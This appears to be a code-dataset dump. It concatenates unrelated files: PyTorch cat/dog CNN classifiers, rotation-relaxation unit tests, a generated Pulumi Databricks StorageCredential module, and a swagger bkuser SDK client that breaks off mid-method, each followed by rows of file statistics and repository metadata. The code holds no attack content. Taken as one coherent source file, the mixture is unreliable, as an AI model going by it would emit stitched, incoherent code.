        self.layer2 = conv_block(32, 64)
        self.max_pool2 = torch.nn.MaxPool2d(2, stride=2)
        self.layer3 = conv_block(64, 128)
        self.max_pool3 = torch.nn.MaxPool2d(2, stride=2)
        self.layer4 = conv_block(128, 256)
        self.max_pool4 = torch.nn.MaxPool2d(2, stride=2)
        # Fully connected head: flattened 256x7x7 features -> 2 logits.
        self.classify = torch.nn.Sequential(
            torch.nn.Linear(256 * 7 * 7, 4096),
            torch.nn.ReLU(inplace=True),
            torch.nn.Dropout(0.5),
            torch.nn.Linear(4096, 1024),
            torch.nn.ReLU(inplace=True),
            torch.nn.Linear(1024, 2),
        )

    def forward(self, x):
        """Run conv/pool stages, flatten, and classify."""
        out = self.max_pool1(self.layer1(x))
        out = self.max_pool2(self.layer2(out))
        out = self.max_pool3(self.layer3(out))
        out = self.max_pool4(self.layer4(out))
        out = out.view(-1, 256 * 7 * 7)
        return self.classify(out)
class CatDogClassifier_6l(torch.nn.Module):
    """Six-conv-block CNN emitting 2 class logits (cat vs. dog).

    The head flattens a 1024x1x1 feature map (six /2 max-pools), so the
    input must be 64x64 spatially.
    """

    def __init__(self):
        super().__init__()

        def conv_block(in_ch, out_ch):
            # 3x3 conv (stride 1, pad 1, no bias) followed by in-place ReLU.
            return torch.nn.Sequential(
                torch.nn.Conv2d(in_ch, out_ch, 3, 1, 1, bias=False),
                torch.nn.ReLU(inplace=True),
            )

        self.layer1 = conv_block(3, 32)
        self.max_pool1 = torch.nn.MaxPool2d(2, stride=2)
        self.layer2 = conv_block(32, 64)
        self.max_pool2 = torch.nn.MaxPool2d(2, stride=2)
        self.layer3 = conv_block(64, 128)
        self.max_pool3 = torch.nn.MaxPool2d(2, stride=2)
        self.layer4 = conv_block(128, 256)
        self.max_pool4 = torch.nn.MaxPool2d(2, stride=2)
        self.layer5 = conv_block(256, 512)
        self.max_pool5 = torch.nn.MaxPool2d(2, stride=2)
        self.layer6 = conv_block(512, 1024)
        self.max_pool6 = torch.nn.MaxPool2d(2, stride=2)
        # Fully connected head: flattened 1024x1x1 features -> 2 logits.
        self.classify = torch.nn.Sequential(
            torch.nn.Linear(1024 * 1 * 1, 4096),
            torch.nn.ReLU(inplace=True),
            torch.nn.Dropout(0.5),
            torch.nn.Linear(4096, 1024),
            torch.nn.ReLU(inplace=True),
            torch.nn.Linear(1024, 2),
        )

    def forward(self, x):
        """Run conv/pool stages, flatten, and classify."""
        out = self.max_pool1(self.layer1(x))
        out = self.max_pool2(self.layer2(out))
        out = self.max_pool3(self.layer3(out))
        out = self.max_pool4(self.layer4(out))
        out = self.max_pool5(self.layer5(out))
        out = self.max_pool6(self.layer6(out))
        out = out.view(-1, 1024 * 1 * 1)
        return self.classify(out)
class CatDogClassifier_5l(torch.nn.Module):
    """Five-conv-block CNN emitting 2 class logits (cat vs. dog).

    The head flattens a 512x3x3 feature map (five /2 max-pools), so the
    input must be 96x96 spatially.
    """

    def __init__(self):
        super().__init__()

        def conv_block(in_ch, out_ch):
            # 3x3 conv (stride 1, pad 1, no bias) followed by in-place ReLU.
            return torch.nn.Sequential(
                torch.nn.Conv2d(in_ch, out_ch, 3, 1, 1, bias=False),
                torch.nn.ReLU(inplace=True),
            )

        self.layer1 = conv_block(3, 32)
        self.max_pool1 = torch.nn.MaxPool2d(2, stride=2)
        self.layer2 = conv_block(32, 64)
        self.max_pool2 = torch.nn.MaxPool2d(2, stride=2)
        self.layer3 = conv_block(64, 128)
        self.max_pool3 = torch.nn.MaxPool2d(2, stride=2)
        self.layer4 = conv_block(128, 256)
        self.max_pool4 = torch.nn.MaxPool2d(2, stride=2)
        self.layer5 = conv_block(256, 512)
        self.max_pool5 = torch.nn.MaxPool2d(2, stride=2)
        # Fully connected head: flattened 512x3x3 features -> 2 logits.
        self.classify = torch.nn.Sequential(
            torch.nn.Linear(512 * 3 * 3, 4096),
            torch.nn.ReLU(inplace=True),
            torch.nn.Dropout(0.5),
            torch.nn.Linear(4096, 1024),
            torch.nn.ReLU(inplace=True),
            torch.nn.Linear(1024, 2),
        )

    def forward(self, x):
        """Run conv/pool stages, flatten, and classify."""
        out = self.max_pool1(self.layer1(x))
        out = self.max_pool2(self.layer2(out))
        out = self.max_pool3(self.layer3(out))
        out = self.max_pool4(self.layer4(out))
        out = self.max_pool5(self.layer5(out))
        out = out.view(-1, 512 * 3 * 3)
        return self.classify(out)
class CatDogClassifier_5l_bn(torch.nn.Module):
    """Five-conv-block CNN with batch normalization, emitting 2 logits.

    Identical to CatDogClassifier_5l except each conv block inserts a
    BatchNorm2d between the convolution and the ReLU. The head flattens a
    512x3x3 feature map (five /2 max-pools), so the input must be 96x96.
    """

    def __init__(self):
        super().__init__()

        def conv_bn_block(in_ch, out_ch):
            # 3x3 conv (stride 1, pad 1, no bias) + BatchNorm + in-place ReLU.
            return torch.nn.Sequential(
                torch.nn.Conv2d(in_ch, out_ch, 3, 1, 1, bias=False),
                torch.nn.BatchNorm2d(out_ch),
                torch.nn.ReLU(inplace=True),
            )

        self.layer1 = conv_bn_block(3, 32)
        self.max_pool1 = torch.nn.MaxPool2d(2, stride=2)
        self.layer2 = conv_bn_block(32, 64)
        self.max_pool2 = torch.nn.MaxPool2d(2, stride=2)
        self.layer3 = conv_bn_block(64, 128)
        self.max_pool3 = torch.nn.MaxPool2d(2, stride=2)
        self.layer4 = conv_bn_block(128, 256)
        self.max_pool4 = torch.nn.MaxPool2d(2, stride=2)
        self.layer5 = conv_bn_block(256, 512)
        self.max_pool5 = torch.nn.MaxPool2d(2, stride=2)
        # Fully connected head: flattened 512x3x3 features -> 2 logits.
        self.classify = torch.nn.Sequential(
            torch.nn.Linear(512 * 3 * 3, 4096),
            torch.nn.ReLU(inplace=True),
            torch.nn.Dropout(0.5),
            torch.nn.Linear(4096, 1024),
            torch.nn.ReLU(inplace=True),
            torch.nn.Linear(1024, 2),
        )

    def forward(self, x):
        """Run conv/pool stages, flatten, and classify."""
        out = self.max_pool1(self.layer1(x))
        out = self.max_pool2(self.layer2(out))
        out = self.max_pool3(self.layer3(out))
        out = self.max_pool4(self.layer4(out))
        out = self.max_pool5(self.layer5(out))
        out = out.view(-1, 512 * 3 * 3)
        return self.classify(out)
class Vgg16(torch.nn.Module):
    """Pretrained VGG-16 backbone with a custom trainable 2-class head.

    The torchvision VGG-16 is loaded with pretrained weights and frozen;
    its classifier is then replaced with a fresh head ending in 2 logits,
    so only the new head's parameters receive gradients.
    """

    def __init__(self):
        super().__init__()
        self.vgg16 = vgg16(pretrained=True)
        # Freeze the pretrained backbone before swapping in the new head.
        self.set_parameter_requires_grad(self.vgg16, True)
        self.classifier = torch.nn.Sequential(
            torch.nn.Linear(512 * 7 * 7, 4096, bias=True),
            torch.nn.ReLU(inplace=True),
            torch.nn.Dropout(0.5),
            torch.nn.Linear(4096, 1024, bias=True),
            torch.nn.ReLU(inplace=True),
            torch.nn.Linear(1024, 2),
        )
        self.vgg16.classifier = self.classifier

    def set_parameter_requires_grad(self, model, feature_extracting):
        """Disable gradients on all of *model*'s parameters when
        *feature_extracting* is truthy; otherwise leave them untouched."""
        if not feature_extracting:
            return
        for parameter in model.parameters():
            parameter.requires_grad = False

    def forward(self, x):
        """Delegate to the (head-swapped) VGG-16 network."""
        return self.vgg16(x)
| 34.040346
| 70
| 0.542922
| 1,468
| 11,812
| 4.285422
| 0.054496
| 0.179145
| 0.068193
| 0.111588
| 0.937848
| 0.920045
| 0.911302
| 0.906056
| 0.870132
| 0.849467
| 0
| 0.080985
| 0.329919
| 11,812
| 346
| 71
| 34.138728
| 0.713834
| 0
| 0
| 0.761092
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051195
| false
| 0
| 0.006826
| 0
| 0.105802
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
abb21f0598f4370e247dd3997382a655755233fb
| 3,672
|
py
|
Python
|
tests/relaxations/test_rotation.py
|
eth-sri/3dcertify
|
bb10f339f80149a9ebc7c07d041b2ef222efb394
|
[
"Apache-2.0"
] | 9
|
2021-03-31T20:27:50.000Z
|
2022-01-07T21:52:47.000Z
|
tests/relaxations/test_rotation.py
|
eth-sri/3dcertify
|
bb10f339f80149a9ebc7c07d041b2ef222efb394
|
[
"Apache-2.0"
] | 2
|
2021-06-21T15:38:07.000Z
|
2021-11-08T09:10:09.000Z
|
tests/relaxations/test_rotation.py
|
eth-sri/3dcertify
|
bb10f339f80149a9ebc7c07d041b2ef222efb394
|
[
"Apache-2.0"
] | 4
|
2021-07-17T15:04:14.000Z
|
2022-02-09T17:51:39.000Z
|
import unittest
from functools import partial
import numpy as np
from parameterized import parameterized
from scipy.spatial.transform import Rotation
from relaxations import taylor
from tests.RelaxationTestCase import RelaxationTestCase, sample_points, sample_params
from transformations.rotation import RotationZ, RotationX, RotationY
from util.rotation import rotate_z
class TestRotationX(RelaxationTestCase):
    """RotationX checks: exactness on concrete angles, and soundness of the
    interval and Taylor relaxations."""

    @parameterized.expand(zip(
        sample_points(),
        np.random.uniform(-10, 10, (100, 1))
    ))
    def test_transformation_float(self, points, alpha):
        # Reference result from scipy's rotation about the x-axis.
        reference = Rotation.from_euler('x', alpha.item())
        expected = points.dot(reference.as_matrix().T)
        actual = RotationX().transform(points, alpha)
        self.assertAlmostEqualNumpy(expected, actual)

    @parameterized.expand(zip(
        sample_points(),
        sample_params(num_params=1)
    ))
    def test_transformation_interval(self, points, interval):
        rotation = RotationX()
        relaxation = rotation.transform(points, interval)
        self.assertSound(relaxation, interval, partial(rotation.transform, points))

    @parameterized.expand(zip(
        sample_points(),
        sample_params(num_params=1)
    ))
    def test_transformation_taylor(self, points, interval):
        rotation = RotationX()
        relaxation = taylor.encode(rotation, points, interval)
        self.assertSound(relaxation, interval, partial(rotation.transform, points))
class TestRotationY(RelaxationTestCase):
    """RotationY checks: exactness on concrete angles, and soundness of the
    interval and Taylor relaxations."""

    @parameterized.expand(zip(
        sample_points(),
        np.random.uniform(-10, 10, (100, 1))
    ))
    def test_transformation_float(self, points, alpha):
        # Reference result from scipy's rotation about the y-axis.
        reference = Rotation.from_euler('y', alpha.item())
        expected = points.dot(reference.as_matrix().T)
        actual = RotationY().transform(points, alpha)
        self.assertAlmostEqualNumpy(expected, actual)

    @parameterized.expand(zip(
        sample_points(),
        sample_params(num_params=1)
    ))
    def test_transformation_interval(self, points, interval):
        rotation = RotationY()
        relaxation = rotation.transform(points, interval)
        self.assertSound(relaxation, interval, partial(rotation.transform, points))

    @parameterized.expand(zip(
        sample_points(),
        sample_params(num_params=1)
    ))
    def test_transformation_taylor(self, points, interval):
        rotation = RotationY()
        relaxation = taylor.encode(rotation, points, interval)
        self.assertSound(relaxation, interval, partial(rotation.transform, points))
class TestRotationZ(RelaxationTestCase):
    """RotationZ checks: exactness against the project's rotate_z reference,
    and soundness of the interval and Taylor relaxations."""

    @parameterized.expand(zip(
        sample_points(),
        np.random.uniform(-10, 10, (100, 1))
    ))
    def test_transformation_float(self, points, alpha):
        expected = rotate_z(points, alpha.item())
        actual = RotationZ().transform(points, alpha)
        self.assertAlmostEqualNumpy(expected, actual)

    @parameterized.expand(zip(
        sample_points(),
        sample_params(num_params=1)
    ))
    def test_transformation_interval(self, points, interval):
        rotation = RotationZ()
        relaxation = rotation.transform(points, interval)
        self.assertSound(relaxation, interval, partial(rotation.transform, points))

    @parameterized.expand(zip(
        sample_points(),
        sample_params(num_params=1)
    ))
    def test_transformation_taylor(self, points, interval):
        rotation = RotationZ()
        relaxation = taylor.encode(rotation, points, interval)
        self.assertSound(relaxation, interval, partial(rotation.transform, points))
# Allow running this test module directly (outside a pytest/unittest runner).
if __name__ == '__main__':
    unittest.main()
| 33.081081
| 85
| 0.684368
| 379
| 3,672
| 6.485488
| 0.16095
| 0.112286
| 0.117168
| 0.102522
| 0.822213
| 0.822213
| 0.792921
| 0.792921
| 0.792921
| 0.792921
| 0
| 0.010356
| 0.211057
| 3,672
| 110
| 86
| 33.381818
| 0.838108
| 0
| 0
| 0.813187
| 0
| 0
| 0.002723
| 0
| 0
| 0
| 0
| 0
| 0.098901
| 1
| 0.098901
| false
| 0
| 0.098901
| 0
| 0.230769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f9f29cae875c319e09db053a906315e476c03fba
| 17,346
|
py
|
Python
|
sdk/python/pulumi_databricks/storage_credential.py
|
pulumi/pulumi-databricks
|
43580d4adbd04b72558f368ff0eef3d03432ebc1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_databricks/storage_credential.py
|
pulumi/pulumi-databricks
|
43580d4adbd04b72558f368ff0eef3d03432ebc1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_databricks/storage_credential.py
|
pulumi/pulumi-databricks
|
43580d4adbd04b72558f368ff0eef3d03432ebc1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['StorageCredentialArgs', 'StorageCredential']
@pulumi.input_type
class StorageCredentialArgs:
    # Generated argument bag for the StorageCredential resource.
    # @pulumi.input_type introspects the decorated getters/setters below, so
    # the exact structure of this class is relied on by the pulumi SDK.
    def __init__(__self__, *,
                 aws_iam_role: Optional[pulumi.Input['StorageCredentialAwsIamRoleArgs']] = None,
                 azure_service_principal: Optional[pulumi.Input['StorageCredentialAzureServicePrincipalArgs']] = None,
                 comment: Optional[pulumi.Input[str]] = None,
                 metastore_id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a StorageCredential resource.
        :param pulumi.Input[str] name: Name of Storage Credentials, which must be unique within the databricks_metastore. Change forces creation of a new resource.
        """
        # Only record arguments that were explicitly supplied, so pulumi can
        # distinguish "unset" from "set to None".
        if aws_iam_role is not None:
            pulumi.set(__self__, "aws_iam_role", aws_iam_role)
        if azure_service_principal is not None:
            pulumi.set(__self__, "azure_service_principal", azure_service_principal)
        if comment is not None:
            pulumi.set(__self__, "comment", comment)
        if metastore_id is not None:
            pulumi.set(__self__, "metastore_id", metastore_id)
        if name is not None:
            pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter(name="awsIamRole")
    def aws_iam_role(self) -> Optional[pulumi.Input['StorageCredentialAwsIamRoleArgs']]:
        return pulumi.get(self, "aws_iam_role")

    @aws_iam_role.setter
    def aws_iam_role(self, value: Optional[pulumi.Input['StorageCredentialAwsIamRoleArgs']]):
        pulumi.set(self, "aws_iam_role", value)

    @property
    @pulumi.getter(name="azureServicePrincipal")
    def azure_service_principal(self) -> Optional[pulumi.Input['StorageCredentialAzureServicePrincipalArgs']]:
        return pulumi.get(self, "azure_service_principal")

    @azure_service_principal.setter
    def azure_service_principal(self, value: Optional[pulumi.Input['StorageCredentialAzureServicePrincipalArgs']]):
        pulumi.set(self, "azure_service_principal", value)

    @property
    @pulumi.getter
    def comment(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "comment")

    @comment.setter
    def comment(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "comment", value)

    @property
    @pulumi.getter(name="metastoreId")
    def metastore_id(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "metastore_id")

    @metastore_id.setter
    def metastore_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "metastore_id", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of Storage Credentials, which must be unique within the databricks_metastore. Change forces creation of a new resource.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class _StorageCredentialState:
    # Generated state bag used when importing/looking up existing
    # StorageCredential resources. Mirrors StorageCredentialArgs; the exact
    # structure is relied on by the @pulumi.input_type machinery.
    def __init__(__self__, *,
                 aws_iam_role: Optional[pulumi.Input['StorageCredentialAwsIamRoleArgs']] = None,
                 azure_service_principal: Optional[pulumi.Input['StorageCredentialAzureServicePrincipalArgs']] = None,
                 comment: Optional[pulumi.Input[str]] = None,
                 metastore_id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering StorageCredential resources.
        :param pulumi.Input[str] name: Name of Storage Credentials, which must be unique within the databricks_metastore. Change forces creation of a new resource.
        """
        # Only record properties that were explicitly supplied, so pulumi can
        # distinguish "unset" from "set to None".
        if aws_iam_role is not None:
            pulumi.set(__self__, "aws_iam_role", aws_iam_role)
        if azure_service_principal is not None:
            pulumi.set(__self__, "azure_service_principal", azure_service_principal)
        if comment is not None:
            pulumi.set(__self__, "comment", comment)
        if metastore_id is not None:
            pulumi.set(__self__, "metastore_id", metastore_id)
        if name is not None:
            pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter(name="awsIamRole")
    def aws_iam_role(self) -> Optional[pulumi.Input['StorageCredentialAwsIamRoleArgs']]:
        return pulumi.get(self, "aws_iam_role")

    @aws_iam_role.setter
    def aws_iam_role(self, value: Optional[pulumi.Input['StorageCredentialAwsIamRoleArgs']]):
        pulumi.set(self, "aws_iam_role", value)

    @property
    @pulumi.getter(name="azureServicePrincipal")
    def azure_service_principal(self) -> Optional[pulumi.Input['StorageCredentialAzureServicePrincipalArgs']]:
        return pulumi.get(self, "azure_service_principal")

    @azure_service_principal.setter
    def azure_service_principal(self, value: Optional[pulumi.Input['StorageCredentialAzureServicePrincipalArgs']]):
        pulumi.set(self, "azure_service_principal", value)

    @property
    @pulumi.getter
    def comment(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "comment")

    @comment.setter
    def comment(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "comment", value)

    @property
    @pulumi.getter(name="metastoreId")
    def metastore_id(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "metastore_id")

    @metastore_id.setter
    def metastore_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "metastore_id", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of Storage Credentials, which must be unique within the databricks_metastore. Change forces creation of a new resource.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
class StorageCredential(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 aws_iam_role: Optional[pulumi.Input[pulumi.InputType['StorageCredentialAwsIamRoleArgs']]] = None,
                 azure_service_principal: Optional[pulumi.Input[pulumi.InputType['StorageCredentialAzureServicePrincipalArgs']]] = None,
                 comment: Optional[pulumi.Input[str]] = None,
                 metastore_id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        > **Private Preview** This feature is in [Private Preview](https://docs.databricks.com/release-notes/release-types.html). Contact your Databricks representative to request access.

        To work with external tables, Unity Catalog introduces two new objects to access and work with external cloud storage:

        - `StorageCredential` represents authentication methods to access cloud storage (e.g. an IAM role for Amazon S3 or a service principal for Azure Storage). Storage credentials are access-controlled to determine which users can use the credential.
        - ExternalLocation are objects that combine a cloud storage path with a Storage Credential that can be used to access the location.

        ## Example Usage

        For AWS

        ```python
        import pulumi
        import pulumi_databricks as databricks

        external = databricks.StorageCredential("external",
            aws_iam_role=databricks.StorageCredentialAwsIamRoleArgs(
                role_arn=aws_iam_role["external_data_access"]["arn"],
            ),
            comment="Managed by TF")
        external_creds = databricks.Grants("externalCreds",
            storage_credential=external.id,
            grants=[databricks.GrantsGrantArgs(
                principal="Data Engineers",
                privileges=["CREATE TABLE"],
            )])
        ```

        For Azure

        ```python
        import pulumi
        import pulumi_databricks as databricks

        external = databricks.StorageCredential("external",
            azure_service_principal=databricks.StorageCredentialAzureServicePrincipalArgs(
                directory_id=var["tenant_id"],
                application_id=azuread_application["ext_cred"]["application_id"],
                client_secret=azuread_application_password["ext_cred"]["value"],
            ),
            comment="Managed by TF")
        external_creds = databricks.Grants("externalCreds",
            storage_credential=external.id,
            grants=[databricks.GrantsGrantArgs(
                principal="Data Engineers",
                privileges=["CREATE TABLE"],
            )])
        ```

        ## Import

        This resource can be imported by name:

        ```sh
        $ pulumi import databricks:index/storageCredential:StorageCredential this <name>
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] name: Name of Storage Credentials, which must be unique within the databricks_metastore. Change forces creation of a new resource.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: Optional[StorageCredentialArgs] = None,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Create a StorageCredential resource from a pre-built
        StorageCredentialArgs bundle. See the keyword-argument overload
        above for the full usage discussion, examples, and import
        instructions.

        :param str resource_name: The name of the resource.
        :param StorageCredentialArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above: determine whether the
        # caller supplied a StorageCredentialArgs object or loose keyword
        # arguments, then funnel both paths through _internal_init.
        resource_args, opts = _utilities.get_resource_args_opts(StorageCredentialArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 aws_iam_role: Optional[pulumi.Input[pulumi.InputType['StorageCredentialAwsIamRoleArgs']]] = None,
                 azure_service_principal: Optional[pulumi.Input[pulumi.InputType['StorageCredentialAzureServicePrincipalArgs']]] = None,
                 comment: Optional[pulumi.Input[str]] = None,
                 metastore_id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        # Shared implementation behind both __init__ overloads; performs the
        # actual resource registration with the Pulumi engine.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: __props__ may only be supplied when
            # rehydrating an existing resource via a valid opts.id.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = StorageCredentialArgs.__new__(StorageCredentialArgs)

            __props__.__dict__["aws_iam_role"] = aws_iam_role
            __props__.__dict__["azure_service_principal"] = azure_service_principal
            __props__.__dict__["comment"] = comment
            __props__.__dict__["metastore_id"] = metastore_id
            __props__.__dict__["name"] = name
        super(StorageCredential, __self__).__init__(
            'databricks:index/storageCredential:StorageCredential',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            aws_iam_role: Optional[pulumi.Input[pulumi.InputType['StorageCredentialAwsIamRoleArgs']]] = None,
            azure_service_principal: Optional[pulumi.Input[pulumi.InputType['StorageCredentialAzureServicePrincipalArgs']]] = None,
            comment: Optional[pulumi.Input[str]] = None,
            metastore_id: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None) -> 'StorageCredential':
        """
        Get an existing StorageCredential resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] name: Name of Storage Credentials, which must be unique within the databricks_metastore. Change forces creation of a new resource.
        """
        # Merging id into opts switches the constructor into "lookup existing
        # resource" mode (see the opts.id branch in _internal_init).
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _StorageCredentialState.__new__(_StorageCredentialState)

        __props__.__dict__["aws_iam_role"] = aws_iam_role
        __props__.__dict__["azure_service_principal"] = azure_service_principal
        __props__.__dict__["comment"] = comment
        __props__.__dict__["metastore_id"] = metastore_id
        __props__.__dict__["name"] = name
        return StorageCredential(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="awsIamRole")
    def aws_iam_role(self) -> pulumi.Output[Optional['outputs.StorageCredentialAwsIamRole']]:
        # AWS IAM role block used to authenticate to S3, if configured.
        return pulumi.get(self, "aws_iam_role")

    @property
    @pulumi.getter(name="azureServicePrincipal")
    def azure_service_principal(self) -> pulumi.Output[Optional['outputs.StorageCredentialAzureServicePrincipal']]:
        # Azure service principal block used to authenticate to Azure
        # Storage, if configured.
        return pulumi.get(self, "azure_service_principal")

    @property
    @pulumi.getter
    def comment(self) -> pulumi.Output[Optional[str]]:
        # Free-form comment attached to the credential.
        return pulumi.get(self, "comment")

    @property
    @pulumi.getter(name="metastoreId")
    def metastore_id(self) -> pulumi.Output[str]:
        # Identifier of the owning metastore (wire name `metastoreId`).
        return pulumi.get(self, "metastore_id")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Name of Storage Credentials, which must be unique within the databricks_metastore. Change forces creation of a new resource.
        """
        return pulumi.get(self, "name")
| 44.025381
| 253
| 0.665571
| 1,847
| 17,346
| 6.002707
| 0.118029
| 0.052584
| 0.077117
| 0.053576
| 0.836114
| 0.818707
| 0.810228
| 0.793903
| 0.789303
| 0.784522
| 0
| 0.000228
| 0.239767
| 17,346
| 393
| 254
| 44.137405
| 0.840525
| 0.344172
| 0
| 0.769608
| 1
| 0
| 0.158715
| 0.103982
| 0
| 0
| 0
| 0
| 0
| 1
| 0.156863
| false
| 0.004902
| 0.034314
| 0.058824
| 0.284314
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e604ec1b539491c043721f298b5423f056c91a7e
| 15,635
|
py
|
Python
|
src/sdk/bkuser_sdk/api/batch_api.py
|
shabbywu/bk-user
|
8ea590958a5c6dd3c71d0b72e1d4866ce327efda
|
[
"MIT"
] | null | null | null |
src/sdk/bkuser_sdk/api/batch_api.py
|
shabbywu/bk-user
|
8ea590958a5c6dd3c71d0b72e1d4866ce327efda
|
[
"MIT"
] | null | null | null |
src/sdk/bkuser_sdk/api/batch_api.py
|
shabbywu/bk-user
|
8ea590958a5c6dd3c71d0b72e1d4866ce327efda
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
蓝鲸用户管理 API
蓝鲸用户管理后台服务 API # noqa: E501
OpenAPI spec version: v2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from bkuser_sdk.api_client import ApiClient
class BatchApi(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        # Default to a fresh ApiClient (with default configuration) when the
        # caller does not inject one.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    def v2_batch_departments_multiple_retrieve_profiles(self, department_ids, **kwargs):  # noqa: E501
        """v2_batch_departments_multiple_retrieve_profiles  # noqa: E501

        Batch-fetch the profiles of the given departments.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.v2_batch_departments_multiple_retrieve_profiles(department_ids, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str department_ids: comma-separated list of department ids (required)
        :param bool recursive:
        :return: list[Profile]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Public wrapper: always request only the deserialized data (not the
        # full (data, status, headers) tuple) from the _with_http_info twin.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.v2_batch_departments_multiple_retrieve_profiles_with_http_info(department_ids, **kwargs)  # noqa: E501
        else:
            (data) = self.v2_batch_departments_multiple_retrieve_profiles_with_http_info(department_ids, **kwargs)  # noqa: E501
            return data

    def v2_batch_departments_multiple_retrieve_profiles_with_http_info(self, department_ids, **kwargs):  # noqa: E501
        """v2_batch_departments_multiple_retrieve_profiles  # noqa: E501

        Batch-fetch the profiles of the given departments.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.v2_batch_departments_multiple_retrieve_profiles_with_http_info(department_ids, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str department_ids: comma-separated list of department ids (required)
        :param bool recursive:
        :return: list[Profile]
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['department_ids', 'recursive']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
